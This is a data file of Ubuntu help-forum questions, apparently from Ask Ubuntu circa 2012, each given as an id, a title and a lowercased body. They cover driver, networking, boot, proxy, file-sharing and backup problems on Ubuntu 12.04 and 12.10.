231825	after upgrade to 12.04 wifi alone does not work , but wifi and lan together do !	i upgraded ubuntu to 12.04 on my msi u100 plus netbook and found that the wifi icon is missing and i have no internet connection . however , if i plug in the ethernet cable and reboot , then the computer connects to wireless too ( and the wifi icon appears ) , and this connection persists after i remove the ethernet cable . now , my question is : how explain to 12.04 that it should connect wireless without a trick with the cable ?
231828	how to authenticate squid against a custom backend ?	i want to setup a proxy service using squid and want it to authenticate against a database or another service . there is an example config at http : //wiki.squid-cache.org/configexamples/authenticate/mysql auth_param basic program /usr/local/squid/libexec/squid_db_auth -- user someuser -- password xxxx -- plaintext -- persist auth_param basic children 5 auth_param basic realm web-proxy auth_param basic credentialsttl 1 minute auth_param basic casesensitive off acl db-auth proxy_auth required http_access allow db-auth http_access allow localhost http_access deny all the relevant snippet appears to be auth_param basic program /usr/local/squid/libexec/squid_db_auth -- user someuser -- password xxxx -- plaintext -- persist do i have to replace someuser with actual username and xxxx with password ? for each user i add , do i have to add it to this config ? ideally , i want a setup whereby , i am able to add/remove users to the service without changing the config file . is this possible ?
231829	how to monitor data usage for each account using 'squid ' ?	suppose i were to build proxy server using squid with multiple accounts . is there a way to determine how much data has been consumed by each account ? by data i mean total sum of all bytes which are sent as a result of a request . so if a webpage is requested , the count should include all bytes ( images , html , js , flash , movies , etc ) . i could not find it in the squid doc . is there a programming hook i can use ? or another program ?
231834	12.04 on lenovo y580 nvidia problems	ok everyone i have looked on here and on multiple websites each claiming to have a method that works to make the nvidia gtx660 in my laptop work . i have tried installing the linux-headers , and all of the build tools and tried to install the driver several times with several versions . every time when i log back in i loose the desktop environment . i 've had to re-install 6 times . anyone have any ideas ? i 'm about to give up and send this laptop back . p.s . i have looked into installing bumblebee ( which supposedly works with my laptop , but i ca n't get past the step of installing the drivers )
231836	how can i batch decrypt a series of pdf files ?	i have a bunch of pdf documents i know the password for and would like to decrypt them . how can i achieve this ?
231839	how to use dmatest.ko ?	i want to initiate a dma-transfer for testing . i stumbled accross a dmatest.c in the kernel sources ( drivers/dma ) . i compiled a kernel with this module and tried it without any params . sudo modprobe dmatest and i get with dmesg __dma_request_channel : fail ( ( null ) ) what are the prerequisites for dmatest.ko ? should i load a special dma-engine ? is a special param for dmatest.ko required ( default should probe anything ! ? ) ?
231840	how do i upgrade firefox to 17.0.1	i have just downloaded and installed the latest version of ubuntu which is 12.10 ( 64 bit , us english ) . the os came with mozilla firefox 16.0.1 on mozilla 's official website , the version is 17.0.1 how do i upgrade the one installed on my computer to the latest 17.0.1 ? please provide detailed instructions as i am a newbie . thanks in advance .
231844	mysql gives syntax error	when i try to access mysql i get this : $ sudo mysql -h localhost -u webmaster [ sudo ] password for webmaster : /usr/local/bin/mysql : 1 : /usr/local/bin/mysql : syntax error : `` ( `` unexpected i used the tutorial on ubuntu to set it up . how can i fix this ?
231845	how to make expo list windows from all workspaces ?	when i press win+w expo only shows the windows of the current workspace . i remember 12.04 had a similar problem ( it was a compiz bug ) and there was a ppa to solve that ( see this question ) . the problem is that ppa does not seem to be maintained any more for quantal 12.10 at least . i really do n't know if this is related to that bug or is just some configuration problem ... so how can i change this behaviour and get expo to show windows from all workspaces ?
231848	terminal tab autocompletion like in mac os	i could not find a screenshot , but i 've seen a colleague of mine doing this : he has a terminal open in his macbook air , starts typing a file name , presses tab and is given a list of suggestions , like in linux , but has a possibility to move a cursor to select a suggestion . then he presses enter and the selected suggestion is entered automatically . is there such a think for ubuntu ? kde ?
231849	how do i avoid su-ing to root	i need to install symantec antivirus for linux on my computer . according to its readme file , it says : debian and ubuntu users should use sudo for installation and when you execute symantec antivirus for linux commands , debian and ubuntu users should use sudo . do not su to root for these actions . in addition , ensure that the user who is running the command is in the sudoers list . question # 1 : how do i avoid su-ing to root ? i 'm new to linux and ubuntu . during the installation process , i entered the following details : name : sharon account name : sharon i notice that whenever i open up a terminal window , it says : sharon @ sharon : ~ $ question # 2 : is sharon @ sharon : ~ $ root ? ps : i am very new to linux and ubuntu ; please excuse me if my questions seem elementary .
231850	ubuntu is booting into terminal instead of gui interface	i recently upgraded my computer to ubuntu 12.04 from 10.04 and it started messing up , as in , freezing up on certain programs and then randomly logging out and going to the log-in screen . i 've done all of the upgrades and it still was n't working properly . now when i turn the computer on , instead of booting to the gui interface , it boots straight to the terminal . is there any command i can type to boot it properly ? and if so , what do i do to keep it booting properly ? i did some research and found that some people used the `` startx '' command , but it did n't work for me . this is what it said : '' x : user not authorized to run the x server , aborting . x10 : fatal 10 error 11 ( resource temporarily unavailable ) on x server `` :0 '' after 7 requests ( 7 known processed ) with 0 events remaining . '' any help would be greatly appreciated !
231851	recommendations from software center are just odd ( or for default and installed apps )	the automatic in-app recommendations i get in the ubuntu software center are just plain odd . i have only installed one game ( openttd ) and the rest of the applications that i have installed are purely software development and debugging centric . i have installed vmware ( visualization ) , evolution ( groupware ) , and plex ( media center server ) . i have also uninstalled a few of the default applications , add-ons , and unity lenses that i would never use . the recommendations i get for my account are exclusively for applications that i have already installed , applications that are instaleld by default ( even the ones i have chosen to uninstall ) , graphic design ; typesetting ; and photo tools , and weird games i have never heard of and that does not look interesting . how are these recommendations intended to work ? are they not personal ( they only appear after logging into my account so i assume they are personal ) ? and how can i improve them ? i have rated a good chunk of applications without that seeming to have any effect on this . for example amazon has this page you can go to to rate the suggested products to help improve the recommendations you will get in the future . is there such a thing on the user side ? how does the rating mechanism work ? ( and where do i find it/can contribute improvements to it ? )
231855	geary mail keeps crashing in ubuntu 12.10 ?	every time i open geary it stays open for a few seconds and then crashes . how can i fix this ?
231856	vlc ca n't open dvb-t	i was using vlc to watching tv and there was any problem . but one day ( about one week ago ) it stopped working . and now i still see this : dtv access error : can not access adapter 0 : no such file or directory main input error : open of dvb-t : //frequency=674000 : bandwidth=8 ' failed i do n't know what happen . i need a help . i use ubuntu 12.10 with vlc form usc .
231857	connections to ubuntu server running on ec2	i have a ubuntu ec2 with its default settings . i 'm using it for a web application that receives request from iphone apps . i was trying to do a stress test to see how many connections could be handled by the server . i increased the serverlimit in apache to 2500 requests and so the maxclients . i did ulimit -n 4096 and also modified limit.conf to add : soft nofile 4096 hard nofile 4096 i did not change anything in iptables . when run my test with about 3000 consecutive https requests , the loop i use to send the requests stops in about 60 seconds with about 1000 requests being served . i repeated this many times , similar results . what could be causing to drop the connections after 60 secons or 1000 requests ? do i need to change anything else to allow more connections to the server ?
231860	atheros ar9285 with ath9k driver	i have ubuntu 12.10 64bit system , and my wifi driver is kinda crazy . wifi card in my notebook is ar9285 atheros with ath9k driver , and after rfkill unblock all command it is able to connect to wireless network , but when i create my own hotspot , i ca n't see that network on other device , anyway ubuntu is connected to it . there were some problems after installing ubuntu , i used rfkill list command and wifi was soft and hard blocked . any idea what should i do ? i feel like i tried almost everything .
231863	problems with kwallet after resuming from suspend	i am running kubuntu 12.10 with all of the recent updates installed and configured on a dell latitude e6500 . if i suspend my laptop either through closing the lid or hitting the function key , upon resume kwallet does not want to unlock . i know i 'm typing the password correctly and i know it 's the right password because it unlocks once i reboot the machine . because kwallet is n't unlocked my wireless wo n't reconnect . i have to logout and log back into the computer to re-unlock kwallet and then can connect to my wireless . this seems to be a relatively new problem , following some form of update . i 'm not sure what happened . any ideas ?
231866	native screen resolution not available after fresh install	after fresh install of ubuntu 12.10 i 've got a wrong resolution : 1920x1080 instead of 1920x1200 . and neither default drivers , nor nvidia 's can recognize my 1920x1200 resolution . what can i do to fix this ?
231867	my unity bar is missing and i can not log in	hello i am running a dual boot of vista and ubuntu 12.04 . i have been testing the open beta if the steam gaming service . i ran into some issues installing it . but nothing crazy and it did work . i installed some games and played them fine . i have played with linux on and off for years but i would consider myself a noob so i suppose i should not have started messing around with wine and non linux games . this is where the problem starts . i was using wine and trying to get a game running when i was told i was missing dependencies . i then go to the package center and am greeted by a warning saying i can not delete python . after clicking repair on the package center it says it again . i try to update my packages in the terminal and then my unity bar disappeared ! i restarted and now it will not let me log in and says unity 2d can not be loaded ? i feel as tho i have gone in over my head and should have taken things a bit slow . any ideas ?
231872	bootable ubuntu studio usb flash drive is reported to be not readable on mac os x	i 'm running mac os x 10.6.8 and i 'm trying to set up my computer to dual boot with ubuntu studio . in order to create a bootable usb flash drive with the installer , i followed the steps from this official howto . at the time the command completed i got an error dialogue stating that the disk is not readable on my computer . i tried to see if it would boot from it anyway by restarting & holding down option . however , the usb stick did n't show up as a boot option . how should i proceed now ?
231873	after updates my scanner stopped working over wifi . how to diagnose ?	i 've been using an hp officejet 6500 all-in-one for a few years now without any trouble . it is connected wirelessly to my network , for both printing & scanning . however , this week , scanning quit working , apparently as a result of some updates . after trying various things i found that it works fine connected using usb , but that 's not a satisfactory fix . i updated hplip to version 3.12.11 and tried reverting to the previous kernel version . also , i 've tried various scanner programs with varying failure messages such as the following hp-scan results : 3.5.0-20-generic x86-64 fails with : opening connection to device ... error : sane : invalid argument ( code=4 ) 3.5.0-21-generic x86-64 fails with : expecting to read 10.9 mb from scanner . reading data : [ | ] 0 % 0 b error : no data read . closing device . any suggestions are welcome . just realized that i should have made clear that printing still works well , via either wireless or usb .
231874	12.10 lost power , boots to grub rescue >	boot-repair http : //paste.ubuntu.com/1458019/ to my novice eyes it appears that the /sda ssd is the problem . file system `` unknown '' . /sdb is my home drive and appears intact . is there anything i can do to attempt recovery on the ssd ? = > grub2 ( v2.00 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ( , msdos1 ) /boot/grub . = > no boot loader is installed in the mbr of /dev/sdb . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdh . sda1 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type ''
231875	how do i get rise of the triad to work on 12.04 ?	i installed it from the software center , but it wo n't start up . am i missing something ?
231876	vmware ca n't find linux headers path	i 'm using ubuntu 12.10 with the kernel 3.7.0-7 from xorg-edgers fresh x crack . now when i try to launch wmware workstation it asks for linux header path like shown here . i tried all the solutions on that page but nothing works ... it was working before i switched to the 3.7 kernel . any idea what i can do to get it work ?
231879	will my nvidia geforce gt 520 graphics card work with ubuntu ?	i have an nvidia geforce gt 520 and was wondering if ubuntu would be able to use it .
231880	pysdm missing in ubuntu 12.10 and higher	i have had to do a fresh install of ubuntu 12.10 . i am trying to install pysdm but it is missing . could anyone please direct me on how to install this gui front end for fstab ? i really do not want to go backwards to have to edit config files , this seems so counter intuitive . i have searched for a repo , none to be found ... not sure where else to ask.. i hope that one of you wonderful people could help me out with either wherei can find this or an alternative i can use ... please no terminal ! ! thanks
231889	can not see files from mounted hd ?	i am having trouble with my windows . i am considering options but before i do this i want to back my files up . in the past i booted into ubuntu using a usb drive and copied files off the hard drive when i could n't boot . i am attempting this now , hoever , i see some files but i do not see the folder that would be `` my documents '' or contain the files on my desktop . is there a reason i am not seeing these files ? do i need to do something else to see all the files on the hd ?
231893	how can i programmatically change the sidebar auto-hide behaviour ?	so minecraft fullscreen seems to not work for me . because of this i just run it in a maximized window . usually what i do is set my sidebar to auto-hide , revealing at the top left corner with 0 sensitivity , so that it does n't take up space or keep popping up . my question is how would i be able to do this through a script ? i currently have a bash script to run minecraft , i could make it a python script or something if needed . my best guess is that there 's a file i can write into that would store these values . i would prefer not to disable it entirely just because i sometimes like to switch to another workspace and open up a web browser through the dash .
231900	how do i play mame games on 12.10 without being interrupted by the screensaver ?	`` gnome-screensaver-command -p '' is gone in 12.10 so mame ca n't poke to keep the screen alive . is there a command i can add before `` mame '' to deactivate the screensaver and one to reactivate it after i exit `` mame '' ? thank you .
231905	i ca n't boot ubuntu - wubildr.mbr is corrupted	i have a pc with windows 8 preloaded , now i want either to replace windows with ubuntu or run both with dual boot , so i installed it with the second option . i have now tried everything to use ubuntu , i downloaded several versions of ubuntu and burn it into dvds and try to boot from there , but it does n't work . when i choose ubuntu in the grub menu , it always ends up saying that the file wubildr.mbr is corrupted or not existing , status 0xc000000f . how can i get around this ?
231906	slow loading of pages ( browser performance )	i have ubuntu 12.10 installed . i notice for certain webpages , firefox and chrome both load them very slowly . in fact , while text content loads quickly , both of the browsers seem to be loading something else for long long time . and some webpages do not load at all ( only when i press refresh i see , for a split moment that content was indeed loaded but was not displayed ) . of course this constant loading of content saps cpu , fan starts running speedily , and returns to normal when i stop these constant loading pages . this problem does not occur in windows 7 on the same laptop . what 's the problem ?
231912	error installing ath9k wireless driver for ubuntu 12.10	i 'm following the instructions of this external link . when i enter sudo make install } } } i get the following error : make -c /lib/modules/3.5.0-17-generic/build m=/home/jonathan/compat-wireless-3.6.8-1 modules make : *** /lib/modules/3.5.0-17-generic/build : no such file or directory . stop . make : *** [ modules ] error 2
231913	what 's the difference between x , xorg , xserver , etc . and their respective versions ?	i do n't understand the difference between x , xorg , xserver , etc etc ... and what most specifically confuses me is this : it seems i 'm running x.org x server 1.7.7 , which is apparently the newest version . yet i also see references all over the web to x server 1.11 and 1.12 ( only 1.11 supports amd catalyst , which is my issue ) . so , i am guessing that the 1.11 refers to something that runs on top of whatever is at version 1.7.7 ? what is the difference , and how can i ensure that i am running version 1.11 ( of whatever it actually is ) instead of 1.12 ?
231914	can not access ubuntu server behind huawei router even after port forwarding	i have an ubuntu 12.10 server installed , got a static ip from my isp . pinging the ip results in success . i also have a huawei echo-life modem . following this site i was able to set the ports to be forwarded . i also checked this with the guys at huawei . the problem is that when i enter my static ip in the browser , i always get stuck at the modem/router login interface . going to the ip address assigned to my ubuntu server ( on my network ) i can see that nginx serves pages correctly . another thing is that getting my modem/router interface is only possible via my local network . i asked a friend to try my static ip but he said he got a blank page . i think this means that the gateway is not accessible from the outside world . i think i 'm missing something minimal here as it 's not supposed to be this complicated setting up a home server . any help would be appreciated .
231915	installing on a vaio s	i have a new vaio s 15 '' with windows 8 pre-installed and uefi . it had both intel on-board graphics and nvidia discrete graphics . installing ubuntu has turned into a nightmare . installing from live usb with default settings results in a black screen and freeze after the splash screen . replacing quick splash with nomodeset in grub ( this seems fairly common ) gets further - but the install then hangs with fb : conflicting fb hw usage inteldrmfb vs vesa vga - removing generic driver as the last message . i can 'try without installing ' and get to the command line with i915.modeset=0 , but i am not sure where - if anywhere - i can go after that . this does not work for the install . i have run out of bug reports that match mine and not at all sure where to go from here .
231917	convert existing ubuntu desktop 12.10 installation to have xen guest support	it looks like previous versions of ubuntu had a package called linux-ec2 that would install a kernel with xen guest support . i was unable to find any packages in specifically 12.10 that install a kernel with xen guest support built in . my question : are there any official packages in quantal quetzal with a xen domu ( guest ) support pre-built so that i do n't need to compile it myself or download someone else 's kernel ?
231924	auto run command in linux	i am trying to automate backup with rsync to an external hard disk . what i want to do is to execute this command automatically when external hard disk is plugged . i do not want to run it when other hard disk or flash drive is plugged in . can some please point me in the right direction . i am using ubuntu 12.10 . here is the command which i am planning to use . rsync -arlth -- progress -- exclude-from '/home/user1/.backupexclude ' /home/user1 media/user1/t500backup/ and here is my .backupexclude file user1 @ scar : ~ $ tail ~/.backupexclude dropbox movies user1 @ scar : ~ $
231929	is there a easy way to test ubuntu on new notebooks before buying it ?	is there an easy way to check a notebook 's hardware compatibility with ubuntu before you buy it ? i really do n't want to buy a notebook home and find several bugs caused by the hardware . i know that dell has some notebooks which are pre-installed ubuntu12.04lts , i.e . the new xps . but what about other notebooks ? is n't there a way to quickly check a notebook 's compatibility with ubuntu ? a way i can see is using a livecd/ubuntu stick and boot in ubuntu first , then run some tests . but the problem is : how to make these tests in a short time automatically ? ? ? and how can i check the hardware compatibility ? i know that i can use lshw or hardinfo to get informations , but only having the information is not enough , there are still some possibilities that your hardware has a bug . for instance , lenovo t410i 's wireless driver has a bug which causes extremely low speed internet connection , i googled a lot and recompiled the driver to fix that bug . so this is the kind of situation i 'm trying to avoid . any help is appreciated .
231932	how to investigate display lockup after alt-tab switching ?	running kubuntu 12.10 on a dell latitude e6500 running the free nvidia driver for my display . if i hit alt-tab to switch between windows too fast the display locks up and the only way i can unlock it is restart the machine , either hard power the box off or ssh into and reboot . all other services and applications continue to run . nothing locks or crashes , no other messages , just the display locks . any ideas where to start troubleshooting this ?
231933	ubuntu on nexus 7 32gb , says only 6gb disk space	i have installed ubuntu on the nexus 7 and have noticed through conky and the file manager that ubuntu says i only have 6gb of disk space . does anyone have any ideas as to why this is happening or should i file a bug report ?
231937	dash shows programs behind	recently when i have been opening my dash the programs that i have open behind them will flash through . i have no idea how to fix this . thanks
231938	pykaraoke not working on ubuntu 12.10 . will it be for python3 ?	i have ubuntu 12.10 and pykaraoke was not working before i worked in 12.10 . it now opens but i can not add folders to the library . only the home folder .
231940	my install did not install the grub loader and i also can not get to windows 7 either	i did a new install on ubuntu 12.04 and when it was finishing it did not install the grub loader and this installation was over a previous installation where the partition should have been formatted . the install will not install to any partition i have . and with no grub i am unable to get to my windows 7
231944	web address fails to resolve with static ip on ubuntu server 12.04	running ubuntu server 12.04.1 lts in virtualbox on a mid-2009 macbook pro . i 've been using no-ip.com to keep my router 's dynamic address up to date and just set up a free host name with them , hoping to get ubuntu server online with that name . downloaded their update client without problems , and updates seem to be working just fine . next steps : set up static ip address on ubuntu server . go into router settings and forward ports 22 and 80 to my computer 's static ip . check functionality with ping and by trying to access the site by name . i found a lot of information online about setting up static ip addresses with 12.04 , but where some sites said to modify resolv.conf , others said that this was an outdated method and that one should just add dns-nameservers xxx.xxx.xxx.xxx to /etc/network/interfaces . following the latter method , i gave my computer the static address of 192.168.0.200 and modified the router 's dhcp range to end at 192.168.0.199 . restarting the network with sudo ifdown eth0 sudo ifup eth0 i confirmed that the computer retained the static ip ( at least for time being ) and killed all dhcp processes . i then set up port forwarding for ports 22 and 80 and pinged the gateway , computers on my own lan , and google 's 8.8.8.8 without issue , with ssh from a home computer also working fine . the noip client continues to update as well . the problem occurs when i try to access the server using the name registered with no-ip.com . the browser tries to load it for a good long while before declaring that it `` failed to open page '' because the page was not responding . any clue as to what 's going on ? i do n't have a firewall on the server side , and i do n't think that the router 's is preventing access . one odd thing is that ubuntu server does not show up under the router 's `` device table '' even though the server is clearly connected to the router . stumped !
231949	ubuntu 12.04 & adnroid debugging	i 'm really struggling to set up debugging from my android phone with my 12.04 installation . for that matter , i 'm struggling to set up pretty much any communication between the two aside from opening rhythm box when i connect via usb . for now , however , i 'll be happy to get the debugging working . here 's what i have so far ... i 'm using a samsung note 2 running android 4.1.1 . i am able to get into debugging mode on the phone , so that 's not the issue . the app has debugging enabled , so that 's not the issue . i have set up the /etc/udev/51-android.rules file , and set the permissions . when i connect the phone via usb the phone does show up in adb devices , so everything should be working . however , when i click select app to debug on the phone the only option i get is `` nothing '' . the only issue i can come up with is that it is somehow related to ubuntu seeing the phone as a media device . i 've done some research but have found no way of changing this .
231950	how do i optimize apt-fast with amazon web services ( aws ) mirrors ?	i know that amazon web services has hosted mirrors that i can use to update my ubuntu machines . i know there is a tool called apt-fast that makes multiple connections to a mirror server to improve speed , but i 'm concerned that increasing this kind of load on a mirror server is n't polite , but i still want a fast mirror , how can i optimize apt-fast with aws ?
231952	i can not log into another linux machine	i can not log into another linux box and i have tried using this form ssh my-user-name @ my-server-ip but it returns the error after 3 tries to permission denied ( publickey , password )
231957	how do i make the unity launcher icons smaller	i 'm looking for a way to make my desktop icons ( unity launchbar ) smaller . i installed ccsm and then tried alt/f2 and entered `` about config '' . however , when i enter `` about config '' , a purple unity icon comes up , but when i click on it , nothing happens .
231966	black screen on tf2 on ubuntu 12.04	i recently installed tf2 and when i launch the game , it gives me a black screen but sound however still works . it will not even display the valve intro unfortunately . any ideas on how coul i solve this ?
231969	nvidia proprietary driver 12.04	i have ubuntu 12.10 an nvidia 540m graphic card with optimis technology . if i install the nvidia current package from software center ( and bumblebee for optimus ) when i run 'optirun glxspheres ' i get 120-140 frames per second . if i install the nvidia current driver from 'additional drivers ' , and run 'optirun glxspheres ' i get 170-190 fps , but glxspheres and all the games i play always start full screen . and this is a problem because some games mess up my desktop resolution and i have to relog to fix it every time i exit a game . so i ca n't use this driver . also if i uninstall the driver from additional drivers and go back to the one in software center i still get 170+ fps and games still start full screen . it 's like installing that driver also modifies some configurations or something . the same thing happens in ubuntu 12.04 . so , the question is : why do all the apps that use the gpu start full screen after i install the nvidia driver from 'additional drivers ' and why do i get lower fps with the driver from 'software center ' ? thanks !
231971	ca n't use livecd to access corrupt hard drive	i have a hard drive with 15 bad sectors . i 'm trying to rescue the files with the latest ubuntu livecd , but the filesystem errors prevent the filesystem from being mounted correctly . i 'm hoping that i 'll be able to create an image of the hard drive and load it onto a working hard drive to recover some files . i do n't understand how to use ddrecover very well as i 'm new to ubuntu and linux in general . how can i recover the data ?
231972	nvidia geforce 6150se nforce 430	i have installed ubuntu 12.10 and my computer has the graphics card : nvidia geforce 6150se nforce 430 my screen usually crashes with raster lines , flashing , and other junk on the screen . what is the best way to get ubuntu running correctly on this graphics card ?
231976	dual boot issue : ubuntu has stopped working after installing win 7	i 've had windows 7 ( 64bit ) and ubuntu 12.10 installed and running fine for a couple of weeks , due some reason i needed to reinstall windows 7 but since reinstalling windows 7 i 'm completely unable to boot ubuntu . after going through some posts , i tried to fix it using boot-repair but instead of getting the problem solved the following message was shown : '' 64bits detected . please use this software in a 64bits session . ( please use ubuntu-secure-remix-64bit ( www.sourceforge.net/p/ubuntu-secured ) which contains a 64bits-compatible version of this software . ) this will enable this feature . '' how can i fix this ? ?
231978	which ubuntu version is suitable for an intel pentium 3 processor ?	my pc has the following specs : intel pentium 3 processor 256 mb ram 20 gb harddisk space which ubuntu version best suits my pc ?
231981	amd raedon 7950 hd with 3 displays verry slow	my dream is to play flightgear on 3 displays . therefore i have the following machine : intel® core™ i5 cpu 760 @ 2.80ghz × 4 8 gb ram amd raedon 7950 hd 3 displays each running with 1920x1080 i tried nearly all driver options ( opensource , proprietary and currently amd beta 12.11 ) drivers seam to be correctly installed . fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7900 series opengl version string : 4.2.11995 compatibility profile context glxgears in standart size ( as it opens ) 3717 frames in 5.0 seconds = 743.318 fps 4033 frames in 5.0 seconds = 806.506 fps 4137 frames in 5.0 seconds = 827.231 fps 4266 frames in 5.0 seconds = 853.051 fps the system is running - but somehow slow alltogether . mouse is hanging from time to time , desktopswitch takes 20sec etc . and in flightgear i get 8 fps/sec . no different if i open one normalsize window or the 3 display setup . question : is my hardware not big enough for this setup . ( processor maybe ? ) or do you think there is a setup problem ? do you need other testoutputs to help me ?
231983	turning off pppoe	i had a pppoe connection and i am trying now to connect to another network without pppoe . i 've made the following modifications in the /etc/network/interfaces file : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # auto lo iface lo inet loopback # auto dsl-provider # iface dsl-provider inet ppp # pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf # provider dsl-provider auto eth0 iface eth0 inet dhcp # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # also , a have deleted the /etc/ppp/peers/dsl-provider file . now , i am unable to restart the network service with sudo /etc/init.d/networking restart and the booting of the system takes me up to 5 minutes . please help . : ) thank you . ps : i 've figured it out . i had the dhcp turned off . i used sudo dhclient eth0 .
231987	if i need to erase gpt data after doing a fixpart , will it also erase all my files on that drive ?	ubuntu 12.04 installer is not recognizing my partition , so i searched for that problem here and found the solution in this link : ubuntu installation does not recognize drive partinioning so my question is if i need to erase gpt data after doing a fixpart , will it also erase all my files on that drive ? thanks in advance for taking the time . : )
231989	5ghz wlan connection on acer s7	during the last days i installed kubuntu on my new acer s7 ultrabook . after some trouble with the the boot configuration this now works fine so that kubuntu runs in parallel with windows 8 on my machine . only one problem i discovered at the moment . with my acer s7 under kubuntu it is not possible to connect to my 5ghz wlan . the machine sees the wlan , but when i try to connect it just tells me for several minutes `` getting ip-address '' and then it stops with `` ca n't connect '' . the 2.4ghz wlan works fine on the machine and also on other machines running linux ( my wifes samsung series 5 , two old dell notebooks ) the 5ghz wlan works fine . just my new acer s7 is not able to connect . does anyone know , how to make this machine also connect to my 5ghz wlan ? within this questions i just found some hints , to disable the n-option to restrict the driver to 54mbit . but on ma machine this does n't help , and the other machines run also without this disabling without any problems . so it seems to be a specific problem of this machine and not that 5ghz wlan would not work properly under ubuntu/linux . bye ralf
231990	how to reconfigure for new hardware after cloning from a desktop to a laptop ?	after cloning a hard drive ( with ubuntu 10.04 ) to a new computer , how can i configure the os to its new hardware ? what i 've done so far : clone desktop hdd to laptop hdd run boot-repair to fix the grub setup on laptop hdd edit /etc/fstab to list the laptop hdd 's uuid enter wlan0 as the wireless adapter in the network manager , to get wireless back up . when i boot , a window pops up saying : ubuntu is running in low-graphics mode . the following error was encountered . you may need to update your configuration to solve this . ( ee ) no devices detected . in the subsequent dialog i choose `` run ubuntu in low-graphics mode for just one session '' , and the boot proceeds without any further error messages . however , some problems remain : the monitor resolution is wrong ; the correct resolution is n't available in the monitors control panel . the headphone jack does n't seem to work . are there some commands i can run which automatically reconfigure the hardware setup , like the ubuntu installer does ? ( you may be wondering why i did this , instead of simply installing ubuntu on my laptop from a cd , then copying over my desktop 's home directory . my workplace desktop uses a particular proxy setup for wired internet connections , which i wo n't be able to replicate from a fresh ubuntu install . ) edit : i have since gotten the wireless back up ; i just had to enter `` wlan0 '' into the network-manager 's box for wireless interfaces .
231995	how to get separate with space or tab in the awk example	while i 'm playing with awk i came to execute like ls -la > > a.txt ; awk { 'print $ 5 $ 1 ' } a.txt ; then its giving output like 53277-rw -- -- -- - 52347-rw -- -- -- - how can i get space between those two friends of output .
231999	how can i get rid of wine menu entries when wine packages are not uninstalled ?	i prefer to use playonlinux to configure wine and manage prefixes . playonlinux requires wine packages to be installed , but i wo n't use default /home/ $ user/.wine prefix . so i deleted default prefix but ca n't get rid of default menu entries . if i delete them manually they are recreated , and occasional click on them will recreate default .wine . is there right way to hide all default wine entries ?
232000	how to set up a caching dns server for my network ?	how do i set up a caching dns server with ubuntu ?
232004	cant see edges of my screen . how do i fix it ?	i have a hisense 42 '' lcd tv ( 1080p ) connected via hdmi to my asus k53e laptop and when i switch it to 1080p ( second screen only ) i cant see the edges of my screen , and it says my tv is a hitachi 52 '' not hisense 42 '' . also when i look at the `` about this computer '' section under graphics it says driver : unknown and experience : standard . im not sure what to do . any help would be great , thanks . my os is ubuntu 12.10 64 bit edition btw .
232005	i ca n't install programs in ubuntu 10.10	i had to reinstall ubuntu 10.10 . now i can not install programs ( flash , chromium ... ) the computer shows this message : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 404 not found
232006	how to i load 11.10 back to my system ?	i was using 11.10 for the last 1 year . and then i upgraded to ubuntu 12.04.1. but i have had many problem since . there was some problem with the graphic being loaded , and major problem with the network . both wired and wireless would be erratic . it is very hard to figure out which driver would be best suited for my system . now i just want to go back to 11.10 . im tired of rebooting again and again in hopes of my system be able to detect the presence of network connection . is it possible to load some files from the system of will have to do the whole process again of downloading making cd etc ?
232007	clicking the gear button causes varius different commands to be executed	i have an ubuntu machine on which when i click the right gear button on the top right of the corner various different commands get executed . sometimes shutdown , other times system settings get opened up . does anyone know why this is happening ?
232008	trying to share files to windows from a mounted drive	this question is a variation on what i asked in an earlier post that did not work for me or i did not quite understand the response . i have done a little more investigation so i hope i can ask a more suitable question . let me start with at the beginning . i had a freenas server that was humming away nicely until the system disk failed . there was no upgrade path to the latest version of freenas so i decided to rebuild the server using ubuntu desktop ( i am a gui guy ) . i booted from an ubuntu live cd to recover my media from the ufs file system of freenas . i copied that data to an ntfs disk ( i wanted to be able to put it on a windows box if required ) . i the installed ubuntu 12.04 to a usb . all good . i managed to share the media etc no problems . i set up crashplan but the backups kept failing with out of disk space errors so i assumed ( maybe incorrectly that temporary files were filling up my usb . the usb somehow go messed up so i started from installing ububtu 12.10 to a new system hdd . the ntfs drive ( /dev/sdb ) is connected and mounts at media/ron/ ... for some reason the drive is mounted twice one with owner root and the other with owner me . doing ls -1 i get this ron @ nas : /media/ron $ ls -l total 16 drwx -- -- -- 2 root root 4096 dec 19 19:51 wd2tb_bottom drwx -- -- -- 1 ron ron 12288 dec 23 19:23 wd2tb_bottom1 i ca n't get into the first due to permission ( when i use sudo to get in there appears to be nothing ) my media appears to be fine in the 2nd mount . using the default ubuntu gui file manager to set share permission i ticked share this folder allow others to create and delete files in this folder guest access ( for people without a user account the folder icon now has arrows indicating i assume that it worked . looking at the permissions however show owner : ron - ron folder access : create and delete files file access : - group : ron folder access : none file access : none others folder access : none file access : - if i change these and save nothing appears to happen and when i open the permission window again they are reset to above . it is like it silently fails when i share these folders they appear on a windows machine but i can not open the folder windows tells me you do n't have permission . if i share a folder in my home drive i can see and access it from windows . video i copy from my media drive to this shared folder can be seen from windows but can not be opened until i change the permission of others . i do n't really want to do this everytime i add a file to the folder i tried to follow the instructions in post i added the following to the //nas/media /media/ron/wd2tb_bottom1/share cifs guest , uid=1000 , iocharset=utf8 , codepage=unicode , unicode 0 0 the instructions do n't really explain what the `` servername/sharename '' should be when i ran sudo mount -a i got this error mount : wrong fs type , bad option , bad superblock on //nas/media , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount . helper program ) in some cases useful info is found in syslog - try dmesg | tail or so in summary i want to share the drive i have but i can not seem to successfully change the properties . any assistance will be sorry for the long post but i have been trying to sort this out for several weeks now . thanks for you assistance .
